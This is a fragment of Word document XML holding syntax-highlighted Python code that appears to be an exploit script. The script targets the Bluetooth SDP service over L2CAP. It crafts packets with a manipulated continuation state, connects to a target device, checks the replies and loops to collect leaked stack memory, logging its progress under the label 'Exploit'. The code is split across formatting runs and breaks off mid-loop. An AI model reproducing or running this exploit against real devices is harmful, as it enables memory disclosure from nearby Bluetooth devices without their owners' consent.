          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x0100</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service_short</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x0001</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mtu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 50</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00"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>n = 30</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA6DC7" w:rsidRPr="0044023C"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FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> packet(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>continuation_state</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>):</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pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'\x02\x00\x00'</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pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> += p16(7 + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>continuation_state</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>))</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pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> += </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'\x35\x03\x19'</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pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> += p16(</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>service</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</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pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> += </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'\x01\x00'</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pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>continuation_state</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">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pkt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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00"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">p = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>log.progress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'Exploit'</w:t>
      </w:r>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p.status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'Creating L2CAP socket'</w:t>
      </w:r>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00"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">sock = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.BluetoothSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.L2CAP)</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6F008A"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.set_l2cap_mtu(sock, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>mtu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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context.endian</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'big'</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p.status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'Connecting to target'</w:t>
      </w:r>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sock.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>((target, 1))</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p.status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'Sending packet 0'</w:t>
      </w:r>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sock.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(packet(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>service_long</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'\x00'</w:t>
      </w:r>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00"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sock.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>mtu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> data[-3] != </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'\x02'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>:</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log.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'Invalid continuation state received.'</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7"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00"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">stack = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>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CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> range(1, n):</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p.status</w:t>
